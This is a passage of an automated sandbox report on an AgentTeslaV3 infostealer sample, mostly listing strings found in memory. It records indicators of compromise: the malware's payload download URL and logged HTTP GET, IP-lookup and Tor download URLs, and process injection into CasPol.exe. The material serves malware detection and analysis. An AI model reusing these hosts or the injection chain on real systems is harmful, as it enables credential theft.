Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.anf.es
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.anf.es/es/address-direccion.html
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863954723.0000000021435000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.chambersign.org1
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: CasPol.exe, 00000005.00000003.252863877116.0000000021420000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
Source: CasPol.exe, 00000005.00000003.251767926056.0000000021482000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766960137.0000000021482000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.datev.de/zertifikat-policy-int0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.datev.de/zertifikat-policy-std0
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863163502.0000000021459000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.defence.gov.au/pki0
Source: 9TpV4rfMmJ.exe String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255522813651.00000000214A7000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764746889.00000000214A1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ecee.gov.pt/dpc0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.eme.lv/repository0
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.firmaprofesional.com/cps0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oaticerts.com/repository.
Source: CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: CasPol.exe, 00000005.00000003.251768856245.000000002144A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: CasPol.exe, 00000005.00000003.251768856245.000000002144A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.252863163502.0000000021459000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: CasPol.exe, 00000005.00000003.251766468796.000000002149D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: CasPol.exe, 00000005.00000003.251767179293.000000002144D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.rcsc.lt/repository0
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: CasPol.exe, 00000005.00000003.251765191340.000000002147C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: CasPol.exe, 00000005.00000003.251767682453.0000000021447000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: CasPol.exe, 00000005.00000002.255514393280.000000001DF65000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251753818478.000000002017E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521171417.000000002013F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521466779.000000002017F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: CasPol.exe, 00000005.00000002.255514393280.000000001DF65000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251753818478.000000002017E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521171417.000000002013F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255521466779.000000002017F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://xMIMbL.com
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%4
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org%GETMozilla/5.0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://eca.hinet.net/repository0
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255518713052.000000001E35E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 00000005.00000003.251768258219.0000000021425000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: CasPol.exe, 00000005.00000003.251766468796.000000002149D000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://repository.luxtrust.lu0
Source: CasPol.exe, 00000005.00000002.255513381718.000000001DE82000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 00000005.00000003.251766671351.000000002145C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: CasPol.exe, 00000005.00000003.251769224606.000000002019A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel
Source: CasPol.exe, 00000005.00000003.251764232754.0000000021492000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.catcert.net/verarrel05
Source: 9TpV4rfMmJ.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 00000005.00000003.251683839425.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488312809.0000000000EB6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.konutmarket.com/
Source: CasPol.exe, 00000005.00000002.255487878510.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.konutmarket.com/(
Source: CasPol.exe, 00000005.00000002.255489071529.0000000001020000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251683674631.0000000000E9A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.konutmarket.com/2022file_izNuHdosu25.bin
Source: CasPol.exe, 00000005.00000002.255488160854.0000000000E95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.konutmarket.com/2022file_izNuHdosu25.binI
Source: CasPol.exe, 00000005.00000003.251764848200.00000000214AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.hu/docs/
Source: CasPol.exe, 00000005.00000003.251768708098.0000000021437000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.netlock.net/docs
Source: CasPol.exe, 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: CasPol.exe, 00000005.00000002.255522691089.000000002148F000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251763544134.0000000021487000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000003.251768056928.000000002148F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknown DNS traffic detected: queries for: www.konutmarket.com
Source: global traffic HTTP traffic detected: GET /2022file_izNuHdosu25.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.konutmarket.com
Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 178.18.206.58:443 -> 192.168.11.20:49803 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 2_2_004056DE

System Summary

Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 9TpV4rfMmJ.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000005.00000002.255513016552.000000001DE31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: CasPol.exe PID: 1264, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_0040352D
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_0040755C 2_2_0040755C
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_00406D85 2_2_00406D85
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Code function: 2_2_71661BFF 2_2_71661BFF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_00D0F35C 5_2_00D0F35C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01169178 5_2_01169178
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0116CC8E 5_2_0116CC8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0116AB90 5_2_0116AB90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01163330 5_2_01163330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0116A770 5_2_0116A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_012021D8 5_2_012021D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01200040 5_2_01200040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_012048B8 5_2_012048B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_012259B8 5_2_012259B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0122A4F0 5_2_0122A4F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0122EB68 5_2_0122EB68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01222740 5_2_01222740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01222B90 5_2_01222B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01225E3E 5_2_01225E3E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01223242 5_2_01223242
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_01220040 5_2_01220040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0122EF18 5_2_0122EF18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_0122AE59 5_2_0122AE59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_1DCB5E48 5_2_1DCB5E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_1DCB470C 5_2_1DCB470C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_1DCB5D60 5_2_1DCB5D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_1DCB6B30 5_2_1DCB6B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_20033A50 5_2_20033A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_20034320 5_2_20034320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_2003C578 5_2_2003C578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_2003BF48 5_2_2003BF48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_20031120 5_2_20031120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 5_2_20033708 5_2_20033708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: String function: 20036288 appears 52 times
Source: 9TpV4rfMmJ.exe, 00000002.00000002.250663618581.000000000040A000.00000004.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameSxsStore.dllj% vs 9TpV4rfMmJ.exe
Source: 9TpV4rfMmJ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9TpV4rfMmJ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 9TpV4rfMmJ.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: edgegdi.dll
Source: 9TpV4rfMmJ.exe Static PE information: invalid certificate
Source: 9TpV4rfMmJ.exe Virustotal: Detection: 15%
Source: 9TpV4rfMmJ.exe ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe File read: C:\Users\user\Desktop\9TpV4rfMmJ.exe
Source: 9TpV4rfMmJ.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\9TpV4rfMmJ.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
Source: C:\Users\user\Desktop\9TpV4rfMmJ.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\9TpV4rfMmJ.exe"
